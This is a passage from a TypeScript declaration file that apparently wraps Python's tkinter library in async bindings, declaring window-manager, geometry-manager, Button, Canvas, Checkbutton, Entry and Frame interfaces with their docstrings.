the user if WHO is \"user\", and by its own policy if WHO is\n\t\t * \"program\".\n\t\t */\n\t\twm_positionfrom(who?): Promise<any>\n\t\twm_positionfrom$({ who }: { who?}): Promise<any>\n\n\t\t/**\n\t\t * Bind function FUNC to command NAME for this widget.\n\t\t * Return the function bound to NAME if None is given. NAME could be\n\t\t * e.g. 
\"WM_SAVE_YOURSELF\" or \"WM_DELETE_WINDOW\".\n\t\t */\n\t\twm_protocol(name?, func?): Promise<any>\n\t\twm_protocol$({ name, func }: { name?, func?}): Promise<any>\n\n\t\t/**\n\t\t * Instruct the window manager whether this widget can be resized\n\t\t * in WIDTH or HEIGHT. Both values are boolean values.\n\t\t */\n\t\twm_resizable(width?, height?): Promise<any>\n\t\twm_resizable$({ width, height }: { width?, height?}): Promise<any>\n\n\t\t/**\n\t\t * Instruct the window manager that the size of this widget shall\n\t\t * be defined by the user if WHO is \"user\", and by its own policy if WHO is\n\t\t * \"program\".\n\t\t */\n\t\twm_sizefrom(who?): Promise<any>\n\t\twm_sizefrom$({ who }: { who?}): Promise<any>\n\n\t\t/**\n\t\t * Query or set the state of this widget as one of normal, icon,\n\t\t * iconic (see wm_iconwindow), withdrawn, or zoomed (Windows only).\n\t\t */\n\t\twm_state(newstate?): Promise<any>\n\t\twm_state$({ newstate }: { newstate?}): Promise<any>\n\n\t\t/**\n\t\t * Set the title of this widget.\n\t\t */\n\t\twm_title(string?): Promise<any>\n\t\twm_title$({ string }: { string?}): Promise<any>\n\n\t\t/**\n\t\t * Instruct the window manager that this widget is transient\n\t\t * with regard to widget MASTER.\n\t\t */\n\t\twm_transient(master?): Promise<any>\n\t\twm_transient$({ master }: { master?}): Promise<any>\n\n\t\t/**\n\t\t * Withdraw this widget from the screen such that it is unmapped\n\t\t * and forgotten by the window manager. Re-draw it with wm_deiconify.\n\t\t */\n\t\twm_withdraw(): Promise<any>\n\t\twm_withdraw$($: {}): Promise<any>\n\t\taspect\n\t\tattributes\n\t\tclient\n\t\tcolormapwindows\n\t\tcommand\n\t\tdeiconify\n\t\tfocusmodel\n\t\tforget\n\t\tframe\n\t\tgeometry\n\t\tgrid\n\t\tgroup\n\t\ticonbitmap\n\t\ticonify\n\t\ticonmask\n\t\ticonname\n\t\ticonphoto\n\t\ticonposition\n\t\ticonwindow\n\t\tmanage\n\t\tmaxsize\n\t\tminsize\n\t\toverrideredirect\n\t\tpositionfrom\n\t\tprotocol\n\t\tresizable\n\t\tsizefrom\n\t\tstate\n\t\ttitle\n\t\ttransient\n\t\twithdraw\n\t}\n\n\t/**\n\t * Toplevel widget of Tk which represents mostly the main window\n\t * of an application. It has an associated Tcl interpreter.\n\t */\n\n\t/**\n\t * Return a new Toplevel widget on screen SCREENNAME. A new Tcl interpreter will\n\t * be created. BASENAME will be used for the identification of the profile file (see\n\t * readprofile).\n\t * It is constructed from sys.argv[0] without extensions if None is given. CLASSNAME\n\t * is the name of the widget class.\n\t */\n\tfunction Tk(screenName?, baseName?, className?, useTk?: boolean, sync?: boolean, use?): Promise<ITk>\n\tfunction Tk$({ screenName, baseName, className, useTk, sync, use }: { screenName?, baseName?, className?, useTk?, sync?, use?}): Promise<ITk>\n\tinterface ITk extends IMisc, IWm {\n\t\tloadtk(): Promise<any>\n\t\tloadtk$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Destroy this and all descendants widgets. This will\n\t\t * end the application of this Tcl interpreter.\n\t\t */\n\t\tdestroy(): Promise<any>\n\t\tdestroy$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Internal function. 
It reads BASENAME.tcl and CLASSNAME.tcl into\n\t\t * the Tcl Interpreter and calls exec on the contents of BASENAME.py and\n\t\t * CLASSNAME.py if such a file exists in the home directory.\n\t\t */\n\t\treadprofile(baseName, className): Promise<any>\n\t\treadprofile$({ baseName, className }): Promise<any>\n\n\t\t/**\n\t\t * Report callback exception on sys.stderr.\n\t\t * \n\t\t * Applications may want to override this internal function, and\n\t\t * should when sys.stderr is None.\n\t\t */\n\t\treport_callback_exception(exc, val, tb): Promise<any>\n\t\treport_callback_exception$({ exc, val, tb }): Promise<any>\n\t}\n\n\t/**\n\t * Geometry manager Pack.\n\t * \n\t * Base class to use the methods pack_* in every widget.\n\t */\n\tinterface IPack {\n\n\t\t/**\n\t\t * Pack a widget in the parent widget. Use as options:\n\t\t * after=widget - pack it after you have packed widget\n\t\t * anchor=NSEW (or subset) - position widget according to\n\t\t * given direction\n\t\t * before=widget - pack it before you will pack widget\n\t\t * expand=bool - expand widget if parent size grows\n\t\t * fill=NONE or X or Y or BOTH - fill widget if widget grows\n\t\t * in=master - use master to contain this widget\n\t\t * in_=master - see 'in' option description\n\t\t * ipadx=amount - add internal padding in x direction\n\t\t * ipady=amount - add internal padding in y direction\n\t\t * padx=amount - add padding in x direction\n\t\t * pady=amount - add padding in y direction\n\t\t * side=TOP or BOTTOM or LEFT or RIGHT - where to add this widget.\n\t\t * \n\t\t */\n\t\tpack_configure(cnf?): Promise<any>\n\t\tpack_configure$({ cnf }: { cnf?}): Promise<any>\n\n\t\t/**\n\t\t * Unmap this widget and do not use it for the packing order.\n\t\t */\n\t\tpack_forget(): Promise<any>\n\t\tpack_forget$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return information about the packing options\n\t\t * for this widget.\n\t\t */\n\t\tpack_info(): Promise<any>\n\t\tpack_info$($: {}): Promise<any>\n\t\tpack\n\t\tinfo\n\t}\n\n\t/**\n\t * Geometry manager Place.\n\t * \n\t * Base class to use the methods place_* in every widget.\n\t */\n\tinterface IPlace {\n\n\t\t/**\n\t\t * Place a widget in the parent widget. 
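A hypothetical sketch ('label' is an\n\t\t * assumed widget; options are passed as a cnf mapping per the signature\n\t\t * declared below):\n\t\t * \n\t\t *     await label.place_configure({ relx: 0.5, rely: 0.5, anchor: 'center' })\n\t\t * \n\t\t * 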
Use as options:\n\t\t * in=master - master relative to which the widget is placed\n\t\t * in_=master - see 'in' option description\n\t\t * x=amount - locate anchor of this widget at position x of master\n\t\t * y=amount - locate anchor of this widget at position y of master\n\t\t * relx=amount - locate anchor of this widget between 0.0 and 1.0\n\t\t * relative to width of master (1.0 is right edge)\n\t\t * rely=amount - locate anchor of this widget between 0.0 and 1.0\n\t\t * relative to height of master (1.0 is bottom edge)\n\t\t * anchor=NSEW (or subset) - position anchor according to given direction\n\t\t * width=amount - width of this widget in pixel\n\t\t * height=amount - height of this widget in pixel\n\t\t * relwidth=amount - width of this widget between 0.0 and 1.0\n\t\t * relative to width of master (1.0 is the same width\n\t\t * as the master)\n\t\t * relheight=amount - height of this widget between 0.0 and 1.0\n\t\t * relative to height of master (1.0 is the same\n\t\t * height as the master)\n\t\t * bordermode=\"inside\" or \"outside\" - whether to take border width of\n\t\t * master widget into account\n\t\t * \n\t\t */\n\t\tplace_configure(cnf?): Promise<any>\n\t\tplace_configure$({ cnf }: { cnf?}): Promise<any>\n\n\t\t/**\n\t\t * Unmap this widget.\n\t\t */\n\t\tplace_forget(): Promise<any>\n\t\tplace_forget$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return information about the placing options\n\t\t * for this widget.\n\t\t */\n\t\tplace_info(): Promise<any>\n\t\tplace_info$($: {}): Promise<any>\n\t\tplace\n\t}\n\n\t/**\n\t * Geometry manager Grid.\n\t * \n\t * Base class to use the methods grid_* in every widget.\n\t */\n\tinterface IGrid {\n\n\t\t/**\n\t\t * Position a widget in the parent widget in a grid. Use as options:\n\t\t * column=number - use cell identified with given column (starting with 0)\n\t\t * columnspan=number - this widget will span several columns\n\t\t * in=master - use master to contain this widget\n\t\t * in_=master - see 'in' option description\n\t\t * ipadx=amount - add internal padding in x direction\n\t\t * ipady=amount - add internal padding in y direction\n\t\t * padx=amount - add padding in x direction\n\t\t * pady=amount - add padding in y direction\n\t\t * row=number - use cell identified with given row (starting with 0)\n\t\t * rowspan=number - this widget will span several rows\n\t\t * sticky=NSEW - if cell is larger on which sides will this\n\t\t * widget stick to the cell boundary\n\t\t * \n\t\t */\n\t\tgrid_configure(cnf?): Promise<any>\n\t\tgrid_configure$({ cnf }: { cnf?}): Promise<any>\n\n\t\t/**\n\t\t * Unmap this widget.\n\t\t */\n\t\tgrid_forget(): Promise<any>\n\t\tgrid_forget$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Unmap this widget but remember the grid options.\n\t\t */\n\t\tgrid_remove(): Promise<any>\n\t\tgrid_remove$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return information about the options\n\t\t * for positioning this widget in a grid.\n\t\t */\n\t\tgrid_info(): Promise<any>\n\t\tgrid_info$($: {}): Promise<any>\n\t\tlocation\n\t}\n\n\t/**\n\t * Internal class.\n\t */\n\n\t/**\n\t * Construct a widget with the parent widget MASTER, a name WIDGETNAME\n\t * and appropriate options.\n\t */\n\tfunction BaseWidget(master, widgetName, cnf?, kw?, extra?): Promise<IBaseWidget>\n\tfunction BaseWidget$({ master, widgetName, cnf, kw, extra }: { master, widgetName, cnf?, kw?, extra?}): Promise<IBaseWidget>\n\tinterface IBaseWidget extends IMisc {\n\n\t\t/**\n\t\t * Destroy this and all descendants widgets.\n\t\t */\n\t\tdestroy(): 
Promise<any>\n\t\tdestroy$($: {}): Promise<any>\n\t}\n\n\t/**\n\t * Internal class.\n\t * \n\t * Base class for a widget which can be positioned with the geometry managers\n\t * Pack, Place or Grid.\n\t */\n\tinterface IWidget extends IBaseWidget, IPack, IPlace, IGrid {\n\t}\n\n\t/**\n\t * Toplevel widget, e.g. for dialogs.\n\t */\n\n\t/**\n\t * Construct a toplevel widget with the parent MASTER.\n\t * \n\t * Valid resource names: background, bd, bg, borderwidth, class,\n\t * colormap, container, cursor, height, highlightbackground,\n\t * highlightcolor, highlightthickness, menu, relief, screen, takefocus,\n\t * use, visual, width.\n\t */\n\tfunction Toplevel(master?, cnf?): Promise<IToplevel>\n\tfunction Toplevel$({ master, cnf }: { master?, cnf?}): Promise<IToplevel>\n\tinterface IToplevel extends IBaseWidget, IWm {\n\t}\n\n\t/**\n\t * Button widget.\n\t */\n\n\t/**\n\t * Construct a button widget with the parent MASTER.\n\t * \n\t * STANDARD OPTIONS\n\t * \n\t * activebackground, activeforeground, anchor,\n\t * background, bitmap, borderwidth, cursor,\n\t * disabledforeground, font, foreground\n\t * highlightbackground, highlightcolor,\n\t * highlightthickness, image, justify,\n\t * padx, pady, relief, repeatdelay,\n\t * repeatinterval, takefocus, text,\n\t * textvariable, underline, wraplength\n\t * \n\t * WIDGET-SPECIFIC OPTIONS\n\t * \n\t * command, compound, default, height,\n\t * overrelief, state, width\n\t * \n\t */\n\tfunction Button(master?, cnf?): Promise<IButton>\n\tfunction Button$({ master, cnf }: { master?, cnf?}): Promise<IButton>\n\tinterface IButton extends IWidget {\n\n\t\t/**\n\t\t * Flash the button.\n\t\t * \n\t\t * This is accomplished by redisplaying\n\t\t * the button several times, alternating between active and\n\t\t * normal colors. At the end of the flash the button is left\n\t\t * in the same normal/active state as when the command was\n\t\t * invoked. This command is ignored if the button's state is\n\t\t * disabled.\n\t\t * \n\t\t */\n\t\tflash(): Promise<any>\n\t\tflash$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Invoke the command associated with the button.\n\t\t * \n\t\t * The return value is the return value from the command,\n\t\t * or an empty string if there is no command associated with\n\t\t * the button. 
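For example (a hypothetical sketch; 'root' and 'onOk' are\n\t\t * assumed names, and cnf is passed as a mapping per the declared signature):\n\t\t * \n\t\t *     const btn = await Button(root, { text: 'OK', command: onOk })\n\t\t *     const result = await btn.invoke()\n\t\t * \n\t\t * 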
This command is ignored if the button's state\n\t\t * is disabled.\n\t\t * \n\t\t */\n\t\tinvoke(): Promise<any>\n\t\tinvoke$($: {}): Promise<any>\n\t}\n\n\t/**\n\t * Canvas widget to display graphical elements like lines or text.\n\t */\n\n\t/**\n\t * Construct a canvas widget with the parent MASTER.\n\t * \n\t * Valid resource names: background, bd, bg, borderwidth, closeenough,\n\t * confine, cursor, height, highlightbackground, highlightcolor,\n\t * highlightthickness, insertbackground, insertborderwidth,\n\t * insertofftime, insertontime, insertwidth, offset, relief,\n\t * scrollregion, selectbackground, selectborderwidth, selectforeground,\n\t * state, takefocus, width, xscrollcommand, xscrollincrement,\n\t * yscrollcommand, yscrollincrement.\n\t */\n\tfunction Canvas(master?, cnf?): Promise<ICanvas>\n\tfunction Canvas$({ master, cnf }: { master?, cnf?}): Promise<ICanvas>\n\tinterface ICanvas extends IWidget, IXView, IYView {\n\n\t\t/**\n\t\t * Internal function.\n\t\t */\n\t\taddtag(): Promise<any>\n\t\taddtag$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Add tag NEWTAG to all items above TAGORID.\n\t\t */\n\t\taddtag_above(newtag, tagOrId): Promise<any>\n\t\taddtag_above$({ newtag, tagOrId }): Promise<any>\n\n\t\t/**\n\t\t * Add tag NEWTAG to all items.\n\t\t */\n\t\taddtag_all(newtag): Promise<any>\n\t\taddtag_all$({ newtag }): Promise<any>\n\n\t\t/**\n\t\t * Add tag NEWTAG to all items below TAGORID.\n\t\t */\n\t\taddtag_below(newtag, tagOrId): Promise<any>\n\t\taddtag_below$({ newtag, tagOrId }): Promise<any>\n\n\t\t/**\n\t\t * Add tag NEWTAG to item which is closest to pixel at X, Y.\n\t\t * If several match take the top-most.\n\t\t * All items closer than HALO are considered overlapping (all are\n\t\t * closest). If START is specified the next below this tag is taken.\n\t\t */\n\t\taddtag_closest(newtag, x, y, halo?, start?): Promise<any>\n\t\taddtag_closest$({ newtag, x, y, halo, start }: { newtag, x, y, halo?, start?}): Promise<any>\n\n\t\t/**\n\t\t * Add tag NEWTAG to all items in the rectangle defined\n\t\t * by X1,Y1,X2,Y2.\n\t\t */\n\t\taddtag_enclosed(newtag, x1, y1, x2, y2): Promise<any>\n\t\taddtag_enclosed$({ newtag, x1, y1, x2, y2 }): Promise<any>\n\n\t\t/**\n\t\t * Add tag NEWTAG to all items which overlap the rectangle\n\t\t * defined by X1,Y1,X2,Y2.\n\t\t */\n\t\taddtag_overlapping(newtag, x1, y1, x2, y2): Promise<any>\n\t\taddtag_overlapping$({ newtag, x1, y1, x2, y2 }): Promise<any>\n\n\t\t/**\n\t\t * Add tag NEWTAG to all items with TAGORID.\n\t\t */\n\t\taddtag_withtag(newtag, tagOrId): Promise<any>\n\t\taddtag_withtag$({ newtag, tagOrId }): Promise<any>\n\n\t\t/**\n\t\t * Return a tuple of X1,Y1,X2,Y2 coordinates for a rectangle\n\t\t * which encloses all items with tags specified as arguments.\n\t\t */\n\t\tbbox(): Promise<any>\n\t\tbbox$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Unbind for all items with TAGORID for event SEQUENCE the\n\t\t * function identified with FUNCID.\n\t\t */\n\t\ttag_unbind(tagOrId, sequence, funcid?): Promise<any>\n\t\ttag_unbind$({ tagOrId, sequence, funcid }: { tagOrId, sequence, funcid?}): Promise<any>\n\n\t\t/**\n\t\t * Bind to all items with TAGORID at event SEQUENCE a call to function FUNC.\n\t\t * \n\t\t * An additional boolean parameter ADD specifies whether FUNC will be\n\t\t * called additionally to the other bound function or whether it will\n\t\t * replace the previous function. 
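For example (hypothetical; 'canvas',\n\t\t * 'itemId' and 'onItemClick' are assumed names):\n\t\t * \n\t\t *     await canvas.tag_bind(itemId, '<Button-1>', onItemClick)\n\t\t * \n\t\t * 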
See bind for the return value.\n\t\t */\n\t\ttag_bind(tagOrId, sequence?, func?, add?): Promise<any>\n\t\ttag_bind$({ tagOrId, sequence, func, add }: { tagOrId, sequence?, func?, add?}): Promise<any>\n\n\t\t/**\n\t\t * Return the canvas x coordinate of pixel position SCREENX rounded\n\t\t * to nearest multiple of GRIDSPACING units.\n\t\t */\n\t\tcanvasx(screenx, gridspacing?): Promise<any>\n\t\tcanvasx$({ screenx, gridspacing }: { screenx, gridspacing?}): Promise<any>\n\n\t\t/**\n\t\t * Return the canvas y coordinate of pixel position SCREENY rounded\n\t\t * to nearest multiple of GRIDSPACING units.\n\t\t */\n\t\tcanvasy(screeny, gridspacing?): Promise<any>\n\t\tcanvasy$({ screeny, gridspacing }: { screeny, gridspacing?}): Promise<any>\n\n\t\t/**\n\t\t * Return a list of coordinates for the item given in ARGS.\n\t\t */\n\t\tcoords(): Promise<any>\n\t\tcoords$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Create arc shaped region with coordinates x1,y1,x2,y2.\n\t\t */\n\t\tcreate_arc(): Promise<any>\n\t\tcreate_arc$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Create bitmap with coordinates x1,y1.\n\t\t */\n\t\tcreate_bitmap(): Promise<any>\n\t\tcreate_bitmap$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Create image item with coordinates x1,y1.\n\t\t */\n\t\tcreate_image(): Promise<any>\n\t\tcreate_image$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Create line with coordinates x1,y1,...,xn,yn.\n\t\t */\n\t\tcreate_line(): Promise<any>\n\t\tcreate_line$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Create oval with coordinates x1,y1,x2,y2.\n\t\t */\n\t\tcreate_oval(): Promise<any>\n\t\tcreate_oval$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Create polygon with coordinates x1,y1,...,xn,yn.\n\t\t */\n\t\tcreate_polygon(): Promise<any>\n\t\tcreate_polygon$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Create rectangle with coordinates x1,y1,x2,y2.\n\t\t */\n\t\tcreate_rectangle(): Promise<any>\n\t\tcreate_rectangle$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Create text with coordinates x1,y1.\n\t\t */\n\t\tcreate_text(): Promise<any>\n\t\tcreate_text$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Create window with coordinates x1,y1,x2,y2.\n\t\t */\n\t\tcreate_window(): Promise<any>\n\t\tcreate_window$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Delete characters of text items identified by tag or id in ARGS (possibly\n\t\t * several times) from FIRST to LAST character (including).\n\t\t */\n\t\tdchars(): Promise<any>\n\t\tdchars$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Delete items identified by all tag or ids contained in ARGS.\n\t\t */\n\t\tdelete(): Promise<any>\n\t\tdelete$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Delete tag or id given as last arguments in ARGS from items\n\t\t * identified by first argument in ARGS.\n\t\t */\n\t\tdtag(): Promise<any>\n\t\tdtag$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Internal function.\n\t\t */\n\t\tfind(): Promise<any>\n\t\tfind$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return items above TAGORID.\n\t\t */\n\t\tfind_above(tagOrId): Promise<any>\n\t\tfind_above$({ tagOrId }): Promise<any>\n\n\t\t/**\n\t\t * Return all items.\n\t\t */\n\t\tfind_all(): Promise<any>\n\t\tfind_all$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return all items below TAGORID.\n\t\t */\n\t\tfind_below(tagOrId): Promise<any>\n\t\tfind_below$({ tagOrId }): Promise<any>\n\n\t\t/**\n\t\t * Return item which is closest to pixel at X, Y.\n\t\t * If several match take the top-most.\n\t\t * All items closer than HALO are considered overlapping (all are\n\t\t * closest). 
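A hypothetical call: const item = await canvas.find_closest(120, 80). 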
If START is specified the next below this tag is taken.\n\t\t */\n\t\tfind_closest(x, y, halo?, start?): Promise<any>\n\t\tfind_closest$({ x, y, halo, start }: { x, y, halo?, start?}): Promise<any>\n\n\t\t/**\n\t\t * Return all items in rectangle defined\n\t\t * by X1,Y1,X2,Y2.\n\t\t */\n\t\tfind_enclosed(x1, y1, x2, y2): Promise<any>\n\t\tfind_enclosed$({ x1, y1, x2, y2 }): Promise<any>\n\n\t\t/**\n\t\t * Return all items which overlap the rectangle\n\t\t * defined by X1,Y1,X2,Y2.\n\t\t */\n\t\tfind_overlapping(x1, y1, x2, y2): Promise<any>\n\t\tfind_overlapping$({ x1, y1, x2, y2 }): Promise<any>\n\n\t\t/**\n\t\t * Return all items with TAGORID.\n\t\t */\n\t\tfind_withtag(tagOrId): Promise<any>\n\t\tfind_withtag$({ tagOrId }): Promise<any>\n\n\t\t/**\n\t\t * Set focus to the first item specified in ARGS.\n\t\t */\n\t\tfocus(): Promise<any>\n\t\tfocus$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return tags associated with the first item specified in ARGS.\n\t\t */\n\t\tgettags(): Promise<any>\n\t\tgettags$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Set cursor at position POS in the item identified by TAGORID.\n\t\t * In ARGS TAGORID must be first.\n\t\t */\n\t\ticursor(): Promise<any>\n\t\ticursor$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return position of cursor as integer in item specified in ARGS.\n\t\t */\n\t\tindex(): Promise<any>\n\t\tindex$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Insert TEXT in item TAGORID at position POS. ARGS must\n\t\t * be TAGORID POS TEXT.\n\t\t */\n\t\tinsert(): Promise<any>\n\t\tinsert$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return the resource value for an OPTION for item TAGORID.\n\t\t */\n\t\titemcget(tagOrId, option): Promise<any>\n\t\titemcget$({ tagOrId, option }): Promise<any>\n\n\t\t/**\n\t\t * Configure resources of an item TAGORID.\n\t\t * \n\t\t * The values for resources are specified as keyword\n\t\t * arguments. To get an overview about\n\t\t * the allowed keyword arguments call the method without arguments.\n\t\t * \n\t\t */\n\t\titemconfigure(tagOrId, cnf?): Promise<any>\n\t\titemconfigure$({ tagOrId, cnf }: { tagOrId, cnf?}): Promise<any>\n\n\t\t/**\n\t\t * Lower an item TAGORID given in ARGS\n\t\t * (optional below another item).\n\t\t */\n\t\ttag_lower(): Promise<any>\n\t\ttag_lower$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Move an item TAGORID given in ARGS.\n\t\t */\n\t\tmove(): Promise<any>\n\t\tmove$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Move the items given by TAGORID in the canvas coordinate\n\t\t * space so that the first coordinate pair of the bottommost\n\t\t * item with tag TAGORID is located at position (X,Y).\n\t\t * X and Y may be the empty string, in which case the\n\t\t * corresponding coordinate will be unchanged. All items matching\n\t\t * TAGORID remain in the same positions relative to each other.\n\t\t */\n\t\tmoveto(tagOrId, x?, y?): Promise<any>\n\t\tmoveto$({ tagOrId, x, y }: { tagOrId, x?, y?}): Promise<any>\n\n\t\t/**\n\t\t * Print the contents of the canvas to a postscript\n\t\t * file. 
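A hypothetical sketch ('canvas' is an assumed instance):\n\t\t * \n\t\t *     await canvas.postscript({ file: 'drawing.ps', colormode: 'color' })\n\t\t * \n\t\t * 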
Valid options: colormap, colormode, file, fontmap,\n\t\t * height, pageanchor, pageheight, pagewidth, pagex, pagey,\n\t\t * rotate, width, x, y.\n\t\t */\n\t\tpostscript(cnf?): Promise<any>\n\t\tpostscript$({ cnf }: { cnf?}): Promise<any>\n\n\t\t/**\n\t\t * Raise an item TAGORID given in ARGS\n\t\t * (optional above another item).\n\t\t */\n\t\ttag_raise(): Promise<any>\n\t\ttag_raise$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Scale item TAGORID with XORIGIN, YORIGIN, XSCALE, YSCALE.\n\t\t */\n\t\tscale(): Promise<any>\n\t\tscale$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Remember the current X, Y coordinates.\n\t\t */\n\t\tscan_mark(x, y): Promise<any>\n\t\tscan_mark$({ x, y }): Promise<any>\n\n\t\t/**\n\t\t * Adjust the view of the canvas to GAIN times the\n\t\t * difference between X and Y and the coordinates given in\n\t\t * scan_mark.\n\t\t */\n\t\tscan_dragto(x, y, gain?): Promise<any>\n\t\tscan_dragto$({ x, y, gain }: { x, y, gain?}): Promise<any>\n\n\t\t/**\n\t\t * Adjust the end of the selection near the cursor of an item TAGORID to index.\n\t\t */\n\t\tselect_adjust(tagOrId, index): Promise<any>\n\t\tselect_adjust$({ tagOrId, index }): Promise<any>\n\n\t\t/**\n\t\t * Clear the selection if it is in this widget.\n\t\t */\n\t\tselect_clear(): Promise<any>\n\t\tselect_clear$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Set the fixed end of a selection in item TAGORID to INDEX.\n\t\t */\n\t\tselect_from(tagOrId, index): Promise<any>\n\t\tselect_from$({ tagOrId, index }): Promise<any>\n\n\t\t/**\n\t\t * Return the item which has the selection.\n\t\t */\n\t\tselect_item(): Promise<any>\n\t\tselect_item$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Set the variable end of a selection in item TAGORID to INDEX.\n\t\t */\n\t\tselect_to(tagOrId, index): Promise<any>\n\t\tselect_to$({ tagOrId, index }): Promise<any>\n\n\t\t/**\n\t\t * Return the type of the item TAGORID.\n\t\t */\n\t\ttype(tagOrId): Promise<any>\n\t\ttype$({ tagOrId }): Promise<any>\n\t\titemconfig\n\t}\n\n\t/**\n\t * Checkbutton widget which is either in on- or off-state.\n\t */\n\n\t/**\n\t * Construct a checkbutton widget with the parent MASTER.\n\t * \n\t * Valid resource names: activebackground, activeforeground, anchor,\n\t * background, bd, bg, bitmap, borderwidth, command, cursor,\n\t * disabledforeground, fg, font, foreground, height,\n\t * highlightbackground, highlightcolor, highlightthickness, image,\n\t * indicatoron, justify, offvalue, onvalue, padx, pady, relief,\n\t * selectcolor, selectimage, state, takefocus, text, textvariable,\n\t * underline, variable, width, wraplength.\n\t */\n\tfunction Checkbutton(master?, cnf?): Promise<ICheckbutton>\n\tfunction Checkbutton$({ master, cnf }: { master?, cnf?}): Promise<ICheckbutton>\n\tinterface ICheckbutton extends IWidget {\n\n\t\t/**\n\t\t * Put the button in off-state.\n\t\t */\n\t\tdeselect(): Promise<any>\n\t\tdeselect$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Flash the button.\n\t\t */\n\t\tflash(): Promise<any>\n\t\tflash$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Toggle the button and invoke a command if given as resource.\n\t\t */\n\t\tinvoke(): Promise<any>\n\t\tinvoke$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Put the button in on-state.\n\t\t */\n\t\tselect(): Promise<any>\n\t\tselect$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Toggle the button.\n\t\t */\n\t\ttoggle(): Promise<any>\n\t\ttoggle$($: {}): Promise<any>\n\t}\n\n\t/**\n\t * Entry widget which allows displaying simple text.\n\t */\n\n\t/**\n\t * Construct an entry widget with the parent MASTER.\n\t * \n\t * Valid 
resource names: background, bd, bg, borderwidth, cursor,\n\t * exportselection, fg, font, foreground, highlightbackground,\n\t * highlightcolor, highlightthickness, insertbackground,\n\t * insertborderwidth, insertofftime, insertontime, insertwidth,\n\t * invalidcommand, invcmd, justify, relief, selectbackground,\n\t * selectborderwidth, selectforeground, show, state, takefocus,\n\t * textvariable, validate, validatecommand, vcmd, width,\n\t * xscrollcommand.\n\t */\n\tfunction Entry(master?, cnf?): Promise<IEntry>\n\tfunction Entry$({ master, cnf }: { master?, cnf?}): Promise<IEntry>\n\tinterface IEntry extends IWidget, IXView {\n\n\t\t/**\n\t\t * Delete text from FIRST to LAST (not included).\n\t\t */\n\t\tdelete(first, last?): Promise<any>\n\t\tdelete$({ first, last }: { first, last?}): Promise<any>\n\n\t\t/**\n\t\t * Return the text.\n\t\t */\n\t\tget(): Promise<any>\n\t\tget$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Insert cursor at INDEX.\n\t\t */\n\t\ticursor(index): Promise<any>\n\t\ticursor$({ index }): Promise<any>\n\n\t\t/**\n\t\t * Return position of cursor.\n\t\t */\n\t\tindex(index): Promise<any>\n\t\tindex$({ index }): Promise<any>\n\n\t\t/**\n\t\t * Insert STRING at INDEX.\n\t\t */\n\t\tinsert(index, string): Promise<any>\n\t\tinsert$({ index, string }): Promise<any>\n\n\t\t/**\n\t\t * Remember the current X coordinate.\n\t\t */\n\t\tscan_mark(x): Promise<any>\n\t\tscan_mark$({ x }): Promise<any>\n\n\t\t/**\n\t\t * Adjust the view of the entry to 10 times the\n\t\t * difference between X and the coordinate given in\n\t\t * scan_mark.\n\t\t */\n\t\tscan_dragto(x): Promise<any>\n\t\tscan_dragto$({ x }): Promise<any>\n\n\t\t/**\n\t\t * Adjust the end of the selection near the cursor to INDEX.\n\t\t */\n\t\tselection_adjust(index): Promise<any>\n\t\tselection_adjust$({ index }): Promise<any>\n\n\t\t/**\n\t\t * Clear the selection if it is in this widget.\n\t\t */\n\t\tselection_clear(): Promise<any>\n\t\tselection_clear$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Set the fixed end of a selection to INDEX.\n\t\t */\n\t\tselection_from(index): Promise<any>\n\t\tselection_from$({ index }): Promise<any>\n\n\t\t/**\n\t\t * Return True if there are characters selected in the entry, False\n\t\t * otherwise.\n\t\t */\n\t\tselection_present(): Promise<any>\n\t\tselection_present$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Set the selection from START to END (not included).\n\t\t */\n\t\tselection_range(start, end): Promise<any>\n\t\tselection_range$({ start, end }): Promise<any>\n\n\t\t/**\n\t\t * Set the variable end of a selection to INDEX.\n\t\t */\n\t\tselection_to(index): Promise<any>\n\t\tselection_to$({ index }): Promise<any>\n\t\tselect_present\n\t\tselect_range\n\t}\n\n\t/**\n\t * Frame widget which may contain other widgets and can have a 3D border.\n\t */\n\n\t/**\n\t * Construct a frame widget with the parent MASTER.\n\t * \n\t * Valid resource names: background, bd, bg, borderwidth, class,\n\t * colormap, container, cursor, height, highlightbackground,\n\t * highlightcolor, highlightthickness, relief, takefocus, visual, width.\n\t */\n\tfunction Frame(master?, cnf?): Promise<IFrame>\n\tfunction Frame$({ master, cnf }: { master?, cnf?}): Promise<IFrame>\n\tinterface IFrame extends IWidget 